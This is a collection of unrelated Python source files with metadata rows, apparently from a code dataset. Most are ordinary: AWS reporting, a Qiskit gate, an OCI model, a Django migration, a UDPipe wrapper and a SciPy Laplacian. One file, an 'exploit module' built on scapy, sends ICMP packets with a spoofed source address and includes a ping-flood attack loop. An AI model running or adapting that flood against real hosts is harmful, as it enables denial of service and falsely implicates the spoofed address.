arg_parser = argparse.ArgumentParser(prog='unused_aws_resources',
usage='%(prog)s [options]',
description='Count AWS resources')
# Add the arguments
arg_parser.add_argument('--accessKey',
type=str,
required=True,
help='AWS Access Key')
arg_parser.add_argument('--secretKey',
type=str,
required=True,
help='AWS Secret Key')
# Execute the parse_args() method
args = arg_parser.parse_args()
main(args)
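# --- Illustrative follow-up sketch (not part of the original script) ---
# A minimal, hedged helper for consuming the report written by this script.
# It assumes the script has already produced aws_logs/unused_resources.xlsx
# (one sheet per resource type, as built above with pd.ExcelWriter); the
# function name and default path are hypothetical.
def load_unused_resources_report(path='aws_logs/unused_resources.xlsx'):
    """Return a dict mapping sheet name (resource type) to its DataFrame."""
    return pd.read_excel(path, sheet_name=None)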
| unused_aws_resources.py | 21,740 | SYNOPSIS
--------
Get the details of unused resources present across regions in the AWS account
DESCRIPTION
-----------
This script provides a detailed overview of the number of unused resources present in the AWS account.
It provides service-wise details of unused resources lying around in all the regions of the AWS account.
PREREQUISITES
-------------
- Workstation with Python version 3 and above
- AWS python-based SDK: boto3
Installation command: pip3 install boto3
- pandas framework and openpyxl for reporting operations (xlsx file).
Installation command(s):
- pip3 install pandas
- pip3 install openpyxl
- User credentials (Access Key Id and Secret Accces Key) of a user having atleast the Security Audit permission and above on the AWS account
EXAMPLE
-------
This script can be executed on a python compiler (AWS Cloudshell, Powershell, bash, any command line tool with python installed)
Command: python ./unused_aws_resources.py --accessKey <AWS Access Key Id> --secretKey <AWS Secret Access Key>
OUTPUT
------
- The script will provide a summarized count of all unused resources in the account.
- For a detailed view, the user can refer to the .xlsx file that will be generated by the script.
Updating Resource Count Object Showing Resource Distribution Add the arguments Execute the parse_args() method | 1,447 | en | 0.73123 |
import os
from ....modules.utils.config_utils import get_yaml_config
str2yaml = {
"gat": "gat.yaml",
"gcn": "gcn.yaml",
"ggnn": "ggnn.yaml",
"graphsage": "graphsage.yaml",
}
dir_path = os.path.dirname(os.path.realpath(__file__))
def get_graph_embedding_args(graph_embedding_name):
"""
It will build the template for ``GNNBase`` model.
Parameters
----------
graph_embedding_name: str
The graph embedding name. Expected in ["gcn", "gat", "graphsage", "ggnn"].
If it can't find the ``graph_embedding_name``, it will return ``{}``.
Returns
-------
template_dict: dict
The template dict.
The structure is shown as follows:
{
graph_embedding_share: {num_layers: 1, input_size: 300, ...},
graph_embedding_private: {heads: [1], attn_drop: 0.0}
}
The ``graph_embedding_share`` contains the parameters shared by all ``GNNBase`` models.
The ``graph_embedding_private`` contains the parameters specifically in each \
graph_embedding methods.
"""
if graph_embedding_name in str2yaml.keys():
yaml_name = str2yaml[graph_embedding_name]
path = os.path.join(dir_path, yaml_name)
config = get_yaml_config(path)
return config
else:
return {}
__all__ = ["get_graph_embedding_args"]
| graph4nlp/pytorch/modules/config/graph_embedding/__init__.py | 1,373 | It will build the template for ``GNNBase`` model.
Parameters
----------
graph_embedding_name: str
The graph embedding name. Expected in ["gcn", "gat", "graphsage", "ggnn"].
If it can't find the ``graph_embedding_name``, it will return ``{}``.
Returns
-------
template_dict: dict
The template dict.
The structure is shown as follows:
{
graph_embedding_share: {num_layers: 1, input_size: 300, ...},
graph_embedding_private: {heads: [1], attn_drop: 0.0}
}
The ``graph_embedding_share`` contains the parameters shared by all ``GNNBase`` models.
The ``graph_embedding_private`` contains the parameters specifically in each graph_embedding methods. | 702 | en | 0.597779 |
import numpy as np
from skimage import io as ios
import PySimpleGUI as sg
import warnings
import m_specfun as m_fun
def select_lines(infile, contrast, lines, res_dict, fits_dict, wloc, outfil):
"""
    displays a new window with the image infile + start + '.fit'
a rectangle around the selected line can be selected with dragging the mouse
:param infile: filebase of image
:param contrast: brightness of image
:param lines: list of calibration wavelengths
:param res_dict: dictionary
:param fits_dict: "
:param wloc: location of displayed window for selection
:param outfil: filename without extension (.txt) with results of line selection
    :return:
        wlocw: position (x, y) of the selection window when it is closed, used
               to place the window on the next call; the fitted line positions
               themselves are appended to the outfil text file
"""
def fitgaussimage(image, xy0, dxy, lam):
x0 = xy0[0]
y0 = xy0[1]
dx = dxy[0]
dy = dxy[1]
print(x0, y0, dx, dy)
data = image[y0 - dy:y0 + dy, x0 - dx:x0 + dx] # x - y reversed
params, success = m_fun.fit_gaussian_2d(data)
if success in [1, 2, 3, 4]:
(height, x, y, width_x, width_y) = params # x and y reversed
width_x = 2 * np.sqrt(2 * np.log(2)) * np.abs(width_x) # FWHM
width_y = 2 * np.sqrt(2 * np.log(2)) * np.abs(width_y) # FWHM
x = x + y0 - dy # y and x reversed
y = y + x0 - dx
xyw = (y, x, width_y, width_x, lam) # x - y changed back
return xyw
else:
return 0, 0, 0, 0, 0
xyl = []
dxy = [10, 10]
i = i_plot = 0
im, header = m_fun.get_fits_image(infile)
if len(im.shape) == 3:
imbw = np.sum(im, axis=2) # used for fitgaussian(data)
else:
imbw = im
# (ymax, xmax) = im.shape
# print (xmax,ymax)
m_fun.get_fits_keys(header, fits_dict, res_dict, keyprint=False)
# #===================================================================
# new rect_plt
# first get size of graph from tmp.png and size of image
# graph coordinates are in image pixels!
(imy, imx) = im.shape[:2]
image_file = 'tmp.png' # scaled image
imrescale = np.flipud(ios.imread(image_file)) # get shape
(canvasy, canvasx) = imrescale.shape[:2]
wlocw = (wloc[0], wloc[1])
image_elem_sel = [sg.Graph(canvas_size=(canvasx, canvasy), graph_bottom_left=(0, 0),
graph_top_right=(imx, imy), key='-GRAPH-', change_submits=True, drag_submits=True)]
layout_select = [[sg.Ok(), sg.Cancel(), sg.Button('Skip Line'), sg.Button('Finish'),
sg.Button('I'), sg.Button('D'), sg.Text(infile, size=(30, 1)),
sg.Text(key='info', size=(40, 1))], image_elem_sel]
winselect = sg.Window(f'select rectangle for fit size, click lines',
layout_select, finalize=True, location=wlocw,
keep_on_top=True, no_titlebar=False, resizable=True,
disable_close=False, disable_minimize=True, element_padding=(2, 2))
# get the graph element for ease of use later
graph = winselect['-GRAPH-'] # type: sg.Graph
# initialize interactive graphics
winselect_active = True
img = graph.draw_image(image_file, location=(0, imy))
dragging = False
start_point = end_point = prior_rect = None
index = 0
icircle = itext = None
color = 'yellow'
while winselect_active:
event, values = winselect.read()
if event == "-GRAPH-": # if there's a "Graph" event, then it's a mouse
x, y = (values["-GRAPH-"])
if not dragging:
start_point = (x, y)
dragging = True
else:
end_point = (x, y)
if prior_rect:
graph.delete_figure(prior_rect)
if None not in (start_point, end_point):
prior_rect = graph.draw_rectangle(start_point,
end_point, line_color='red')
elif event is not None and event.endswith('+UP'):
# The drawing has ended because mouse up
xy0 = [int(0.5 * (start_point[0] + end_point[0])),
int(0.5 * (start_point[1] + end_point[1]))]
size = (abs(start_point[0] - end_point[0]),
abs(start_point[1] - end_point[1]))
info = winselect["info"]
info.update(value=f"grabbed rectangle at {xy0} with size {size}")
start_point, end_point = None, None # enable grabbing a new rect
dragging = False
if min(size[0], size[1]) > 2: # rectangle
info.update(value=f"rectangle at {xy0} with size {size}")
dxy = size
elif i < len(lines):
if prior_rect:
graph.delete_figure(prior_rect)
print(xy0, lines[i])
xyw = (fitgaussimage(imbw, xy0, dxy, lines[i]))
if xyw[0]: # successful fit
if 0 < xyw[0] < imx and 0 < xyw[1] < imy:
print(np.float16(xyw))
xyl.append(np.float32(xyw))
# Draw the click just made
r = (xyw[2] + xyw[3])/4
icircle = graph.DrawCircle((xyw[0], xyw[1]), r, line_color=color, line_width=3)
itext = graph.DrawText(' ' + str(lines[i]), location=(xyw[0], xyw[1]), color=color,
font=('Arial', 12), angle=45, text_location=sg.TEXT_LOCATION_BOTTOM_LEFT)
info.update(value=f"line {lines[i]} at {np.float16(xyw)}")
graph.update()
i += 1
i_plot += 1
else:
info.update(value='bad fit, try again')
print('bad fit, try again')
else:
info.update(value='Fit not successful, try again')
print('Fit not successful, try again')
else:
info.update(value='all lines measured, press OK or Cancel')
elif event == 'Ok':
if np.array(xyl).shape[0] > 1:
# minimum of two lines needed for fit
xyl = np.array(xyl, dtype=np.float32) # for ordered output
with open(m_fun.change_extension(outfil, '.txt'), 'ab+') as f:
np.savetxt(f, xyl, fmt='%8.2f', header=str(index) + ' ' + str(infile) + '.fit')
np.savetxt(f, np.zeros((1, 5)), fmt='%8.2f')
index += 1
color = 'red' if color == 'yellow' else 'yellow' # alternate colors for spectra
elif icircle:
graph.delete_figure(icircle) # last point
graph.delete_figure(itext)
graph.update()
xyl = []
i = i_plot = 0
elif event == 'Cancel':
for ind in range(i_plot):
xyl = np.array(xyl, dtype=np.float32) # for ordered output
rsq2 = (xyl[ind, 2] + xyl[ind, 3])/5.6
drag_figures = graph.get_figures_at_location((xyl[ind, 0] + rsq2, xyl[ind, 1] + rsq2))
for figure in drag_figures:
if figure != img:
graph.delete_figure(figure)
graph.update()
xyl = []
i = i_plot = 0
elif event == 'Skip Line':
i += 1 # do not increment iplot!
elif event in ('I', 'D'):
if event == 'I':
contrast *= 2
else:
contrast /= 2
im_tmp = imrescale / np.max(imrescale) * 255 * contrast
im_tmp = np.clip(im_tmp, 0.0, 255)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ios.imsave(image_file, np.flipud(im_tmp).astype(np.uint8))
graph.delete_figure(img)
img = graph.draw_image(image_file, location=(0, imy))
graph.send_figure_to_back(img)
elif event in ('Finish', None):
if event == 'Finish':
with open(outfil + '.txt', 'ab+') as f:
np.savetxt(f, np.zeros((1, 5)), fmt='%8.2f')
(x, y) = winselect.current_location()
wlocw = (x, y)
winselect.close()
return wlocw
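# --- Illustrative sketch (not part of the original module) ---
# fitgaussimage() above converts the fitted Gaussian sigma into a full width
# at half maximum via FWHM = 2*sqrt(2*ln(2))*sigma (about 2.3548*sigma). A
# minimal, self-contained check of that relation on a synthetic profile; the
# sigma value is arbitrary.
if __name__ == '__main__':
    sigma = 3.0
    fwhm = 2 * np.sqrt(2 * np.log(2)) * sigma
    x = np.arange(-20.0, 21.0)
    profile = np.exp(-0.5 * (x / sigma) ** 2)
    # The sample nearest +FWHM/2 should be close to half of the peak value (1.0).
    print(fwhm, profile[np.argmin(np.abs(x - fwhm / 2))])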
| myselect.py | 8,658 | displays new window with image infile + start + 'fit
a rectangle around the selected line can be selected with dragging the mouse
:param infile: filebase of image
:param contrast: brightness of image
:param lines: list of calibration wavelengths
:param res_dict: dictionary
:param fits_dict: "
:param wloc: location of displayed window for selection
:param outfil: filename without extension (.txt) with results of line selection
:return:
x0, y0: center coordinates of selected rectangle (int)
dx, dy: half width and height of selected rectangle (int)
x - y reversed x and y reversed FWHM FWHM y and x reversed x - y changed back used for fitgaussian(data) (ymax, xmax) = im.shape print (xmax,ymax) =================================================================== new rect_plt first get size of graph from tmp.png and size of image graph coordinates are in image pixels! scaled image get shape get the graph element for ease of use later type: sg.Graph initialize interactive graphics if there's a "Graph" event, then it's a mouse The drawing has ended because mouse up enable grabbing a new rect rectangle successful fit Draw the click just made minimum of two lines needed for fit for ordered output alternate colors for spectra last point for ordered output do not increment iplot! | 1,289 | en | 0.784972 |
# -*- coding: utf-8 -*-
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Pauli X (bit-flip) gate.
Author: Andrew Cross
"""
from qiskit import QuantumRegister
from qiskit import QuantumCircuit
from qiskit import Gate
from qiskit import CompositeGate
from qiskit import InstructionSet
from qiskit.extensions.standard import header
class XGate(Gate):
"""Pauli X (bit-flip) gate."""
def __init__(self, qubit, circ=None):
"""Create new X gate."""
super(XGate, self).__init__("x", [], [qubit], circ)
def qasm(self):
"""Return OPENQASM string."""
qubit = self.arg[0]
return self._qasmif("x %s[%d];" % (qubit[0].name, qubit[1]))
def inverse(self):
"""Invert this gate."""
return self # self-inverse
def reapply(self, circ):
"""Reapply this gate to corresponding qubits in circ."""
self._modifiers(circ.x(self.arg[0]))
def x(self, q):
"""Apply X to q."""
if isinstance(q, QuantumRegister):
gs = InstructionSet()
for j in range(q.size):
gs.add(self.x((q, j)))
return gs
else:
self._check_qubit(q)
return self._attach(XGate(q, self))
QuantumCircuit.x = x
CompositeGate.x = x
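# --- Editor's note: hedged usage sketch, not part of the original module ---
# Illustrates the x() helper patched onto QuantumCircuit above; the constructor
# signatures QuantumRegister(name, size) and QuantumCircuit(*regs) are assumed
# from the same 2017-era API, and the names below are purely illustrative.
#     q = QuantumRegister("q", 2)
#     circ = QuantumCircuit(q)
#     circ.x(q)           # register argument: one XGate is attached per qubit
#     circ.x((q, 0))      # single-qubit argument: one XGate on qubit 0
#     print(circ.qasm())  # each XGate contributes an "x q[i];" line via qasm()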
| qiskit/extensions/standard/x.py | 1,932 | Pauli X (bit-flip) gate.
Create new X gate.
Invert this gate.
Return OPENQASM string.
Reapply this gate to corresponding qubits in circ.
Apply X to q.
Pauli X (bit-flip) gate.
Author: Andrew Cross
-*- coding: utf-8 -*- Copyright 2017 IBM RESEARCH. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================= self-inverse | 884 | en | 0.803278 |
# coding: utf-8
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ScheduleSecretDeletionDetails(object):
"""
Details for scheduling the deletion of the specified secret.
"""
def __init__(self, **kwargs):
"""
Initializes a new ScheduleSecretDeletionDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param time_of_deletion:
The value to assign to the time_of_deletion property of this ScheduleSecretDeletionDetails.
:type time_of_deletion: datetime
"""
self.swagger_types = {
'time_of_deletion': 'datetime'
}
self.attribute_map = {
'time_of_deletion': 'timeOfDeletion'
}
self._time_of_deletion = None
@property
def time_of_deletion(self):
"""
Gets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:return: The time_of_deletion of this ScheduleSecretDeletionDetails.
:rtype: datetime
"""
return self._time_of_deletion
@time_of_deletion.setter
def time_of_deletion(self, time_of_deletion):
"""
Sets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:param time_of_deletion: The time_of_deletion of this ScheduleSecretDeletionDetails.
:type: datetime
"""
self._time_of_deletion = time_of_deletion
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
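# --- Editor's note: hedged usage sketch, not part of the original module ---
# Builds the request body as a caller would before passing it to the Vault
# client's schedule_secret_deletion operation (the client call itself is an
# assumption and omitted here).
if __name__ == "__main__":
    from datetime import datetime, timedelta
    details = ScheduleSecretDeletionDetails()
    details.time_of_deletion = datetime.utcnow() + timedelta(days=30)
    print(details)  # __repr__ renders the populated field via formatted_flat_dict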
| darling_ansible/python_venv/lib/python3.7/site-packages/oci/vault/models/schedule_secret_deletion_details.py | 2,549 | Details for scheduling the deletion of the specified secret.
Initializes a new ScheduleSecretDeletionDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param time_of_deletion:
The value to assign to the time_of_deletion property of this ScheduleSecretDeletionDetails.
:type time_of_deletion: datetime
Gets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:return: The time_of_deletion of this ScheduleSecretDeletionDetails.
:rtype: datetime
Sets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:param time_of_deletion: The time_of_deletion of this ScheduleSecretDeletionDetails.
:type: datetime
coding: utf-8 Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved. This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. noqa: F401 | 1,378 | en | 0.776249 |
# Generated by Django 2.0.4 on 2018-04-20 09:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('daily_tracker', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='attandance',
name='enter_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='attandance',
name='out_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='attandance',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL),
),
]
| office_tracker/daily_tracker/migrations/0002_auto_20180420_0946.py | 897 | Generated by Django 2.0.4 on 2018-04-20 09:46 | 45 | en | 0.67918 |
"""
Copyright (c) 2017, Syslog777
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Desktop nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import sys
from scapy.all import *
class Ping:
def __init__(self, parser):
parser.add_argument('-f', "--flood", action="store_true")
parser.add_argument("--src", nargs="?", default="172.217.12.110",
help="Source IP address for IP layer of ICMP packet\n"
"Default source address: google server")
try:
self.args = parser.parse_args()
if not (self.args.ping):
print("Host required!")
parser.print_help()
sys.exit(1)
except BaseException:
parser.print_help()
sys.exit(1)
self.host = self.args.ping
self.src = self.args.src
self.flood = self.args.flood
def ping(self):
network_layer = IP(src=self.src, dst=self.host)
        packet = network_layer / ICMP(type=8)  # echo request is ICMP type 8, code 0
print("Ping host at {} from {}".format(self.host, self.src))
send(packet)
def flood_(self):
print("\n###########################################")
print("# Starting ICMP/Ping Flood attack...")
print("###########################################\n")
        for _ in range(1, 254):
            # build the packet; the spoofed source stays fixed at self.src
            network_layer = IP(src=self.src, dst=self.host)
            packet = network_layer / ICMP(type=8)  # echo request is ICMP type 8, code 0
send(packet)
def execute(self):
if self.flood:
self.flood_()
        else:
            self.ping()
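# --- Editor's note: hedged usage sketch, not part of the original module ---
# The constructor above only registers --flood and --src, so the 'ping' target
# argument is assumed to be added by the surrounding framework; a stand-alone
# driver would look roughly like this (scapy's send() needs root privileges).
#     import argparse
#     parser = argparse.ArgumentParser()
#     parser.add_argument('ping', nargs='?', help='target host or IP')
#     Ping(parser).execute()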
| psak_src/psak_src/exploit_modules/ping.py | 3,034 | Copyright (c) 2017, Syslog777
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Desktop nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
build the packet | 1,522 | en | 0.89263 |
import os
import pyconll
from ufal.udpipe import Model, Pipeline, ProcessingError
class UDPipeToken:
def __init__(self, ud_token, upos=None, tags=None):
self.id = ud_token.id
self.form = ud_token.form
self.upos = ud_token.upos if upos is None else upos
self.lemma = ud_token.lemma
self.tags = [(k + '=' + list(vx)[0]) for k, vx in ud_token.feats.items()] if tags is None else list(tags)
self.deprel = ud_token.deprel
self.head = ud_token.head
def __repr__(self):
return self.form
class UdpipeParser:
def __init__(self):
self.model = None
self.pipeline = None
self.error = None
def load(self, model_path):
if os.path.isfile(model_path):
udp_model_file = model_path
else:
udp_model_file = os.path.join(model_path, 'udpipe_syntagrus.model')
self.model = Model.load(udp_model_file)
self.pipeline = Pipeline(self.model, 'tokenize', Pipeline.DEFAULT, Pipeline.DEFAULT, 'conllu')
self.error = ProcessingError()
def parse_text(self, text):
parsings = []
processed = self.pipeline.process(text, self.error)
if self.error.occurred():
return None
try:
for parsing0 in pyconll.load_from_string(processed):
parsing = []
for token in parsing0:
utoken = token.form.lower()
if utoken in ['чтоб']:
                        # Fix annotation errors for certain words in UDPipe.Syntagrus
parsing.append(UDPipeToken(token, upos='SCONJ', tags=[]))
elif utoken in ['средь']:
parsing.append(UDPipeToken(token, upos='ADP', tags=[]))
else:
parsing.append(UDPipeToken(token))
parsings.append(parsing)
except:
return None
return parsings
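# --- Editor's note: hedged usage sketch, not part of the original module ---
# The model path below is a placeholder; any Russian UDPipe model works, e.g.
# the udpipe_syntagrus.model that load() also accepts via a directory fallback.
if __name__ == "__main__":
    demo_parser = UdpipeParser()
    demo_parser.load("/path/to/udpipe_syntagrus.model")  # placeholder path
    for sentence in demo_parser.parse_text("Мама мыла раму.") or []:
        print([(tok.form, tok.upos, tok.lemma) for tok in sentence])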
| py/generative_poetry/udpipe_parser.py | 2,024 | Исправляем ошибки разметки некоторых слов в UDPipe.Syntagrus | 60 | ru | 0.92086 |
"""
Laplacian of a compressed-sparse graph
"""
# Authors: Aric Hagberg <hagberg@lanl.gov>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Jake Vanderplas <vanderplas@astro.washington.edu>
# License: BSD
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.sparse import isspmatrix, coo_matrix
###############################################################################
# Graph laplacian
def laplacian(csgraph, normed=False, return_diag=False):
""" Return the Laplacian matrix of a directed graph.
For non-symmetric graphs the out-degree is used in the computation.
Parameters
----------
csgraph : array_like or sparse matrix, 2 dimensions
compressed-sparse graph, with shape (N, N).
normed : bool, optional
If True, then compute normalized Laplacian.
return_diag : bool, optional
If True, then return diagonal as well as laplacian.
Returns
-------
lap : ndarray
The N x N laplacian matrix of graph.
diag : ndarray
The length-N diagonal of the laplacian matrix.
diag is returned only if return_diag is True.
Notes
-----
The Laplacian matrix of a graph is sometimes referred to as the
"Kirchoff matrix" or the "admittance matrix", and is useful in many
parts of spectral graph theory. In particular, the eigen-decomposition
of the laplacian matrix can give insight into many properties of the graph.
For non-symmetric directed graphs, the laplacian is computed using the
out-degree of each node.
Examples
--------
>>> from scipy.sparse import csgraph
>>> G = np.arange(5) * np.arange(5)[:, np.newaxis]
>>> G
array([[ 0, 0, 0, 0, 0],
[ 0, 1, 2, 3, 4],
[ 0, 2, 4, 6, 8],
[ 0, 3, 6, 9, 12],
[ 0, 4, 8, 12, 16]])
>>> csgraph.laplacian(G, normed=False)
array([[ 0, 0, 0, 0, 0],
[ 0, 9, -2, -3, -4],
[ 0, -2, 16, -6, -8],
[ 0, -3, -6, 21, -12],
[ 0, -4, -8, -12, 24]])
"""
if csgraph.ndim != 2 or csgraph.shape[0] != csgraph.shape[1]:
raise ValueError('csgraph must be a square matrix or array')
    if normed and (np.issubdtype(csgraph.dtype, np.signedinteger)
                   or np.issubdtype(csgraph.dtype, np.unsignedinteger)):
        csgraph = csgraph.astype(np.float64)
if isspmatrix(csgraph):
return _laplacian_sparse(csgraph, normed=normed,
return_diag=return_diag)
else:
return _laplacian_dense(csgraph, normed=normed,
return_diag=return_diag)
def _laplacian_sparse(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
if not graph.format == 'coo':
lap = (-graph).tocoo()
else:
lap = -graph.copy()
diag_mask = (lap.row == lap.col)
if not diag_mask.sum() == n_nodes:
# The sparsity pattern of the matrix has holes on the diagonal,
# we need to fix that
diag_idx = lap.row[diag_mask]
diagonal_holes = list(set(range(n_nodes)).difference(
diag_idx))
new_data = np.concatenate([lap.data, np.ones(len(diagonal_holes))])
new_row = np.concatenate([lap.row, diagonal_holes])
new_col = np.concatenate([lap.col, diagonal_holes])
lap = coo_matrix((new_data, (new_row, new_col)), shape=lap.shape)
diag_mask = (lap.row == lap.col)
lap.data[diag_mask] = 0
w = -np.asarray(lap.sum(axis=1)).squeeze()
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap.data /= w[lap.row]
lap.data /= w[lap.col]
lap.data[diag_mask] = (1 - w_zeros[lap.row[diag_mask]]).astype(lap.data.dtype)
else:
lap.data[diag_mask] = w[lap.row[diag_mask]]
if return_diag:
return lap, w
return lap
def _laplacian_dense(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
lap = -np.asarray(graph) # minus sign leads to a copy
# set diagonal to zero
lap.flat[::n_nodes + 1] = 0
w = -lap.sum(axis=0)
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap /= w
lap /= w[:, np.newaxis]
lap.flat[::n_nodes + 1] = 1 - w_zeros
else:
lap.flat[::n_nodes + 1] = w
if return_diag:
return lap, w
return lap
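# --- Editor's note: hedged self-check sketch, not part of the original module ---
# Cross-checks the dense and sparse code paths above on the docstring's example
# graph; scipy.sparse.csr_matrix is assumed available (scipy is already a
# dependency of this module).
if __name__ == "__main__":
    from scipy.sparse import csr_matrix
    G = np.arange(5) * np.arange(5)[:, np.newaxis]
    dense_lap = laplacian(G.astype(float), normed=True)
    sparse_lap = laplacian(csr_matrix(G, dtype=float), normed=True)
    print(np.allclose(dense_lap, sparse_lap.toarray()))  # both paths should agree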
| docker_version/resources/usr/local/lib/python2.7/dist-packages/scipy/sparse/csgraph/_laplacian.py | 4,487 | Return the Laplacian matrix of a directed graph.
For non-symmetric graphs the out-degree is used in the computation.
Parameters
----------
csgraph : array_like or sparse matrix, 2 dimensions
compressed-sparse graph, with shape (N, N).
normed : bool, optional
If True, then compute normalized Laplacian.
return_diag : bool, optional
If True, then return diagonal as well as laplacian.
Returns
-------
lap : ndarray
The N x N laplacian matrix of graph.
diag : ndarray
The length-N diagonal of the laplacian matrix.
diag is returned only if return_diag is True.
Notes
-----
The Laplacian matrix of a graph is sometimes referred to as the
"Kirchoff matrix" or the "admittance matrix", and is useful in many
parts of spectral graph theory. In particular, the eigen-decomposition
of the laplacian matrix can give insight into many properties of the graph.
For non-symmetric directed graphs, the laplacian is computed using the
out-degree of each node.
Examples
--------
>>> from scipy.sparse import csgraph
>>> G = np.arange(5) * np.arange(5)[:, np.newaxis]
>>> G
array([[ 0, 0, 0, 0, 0],
[ 0, 1, 2, 3, 4],
[ 0, 2, 4, 6, 8],
[ 0, 3, 6, 9, 12],
[ 0, 4, 8, 12, 16]])
>>> csgraph.laplacian(G, normed=False)
array([[ 0, 0, 0, 0, 0],
[ 0, 9, -2, -3, -4],
[ 0, -2, 16, -6, -8],
[ 0, -3, -6, 21, -12],
[ 0, -4, -8, -12, 24]])
Laplacian of a compressed-sparse graph
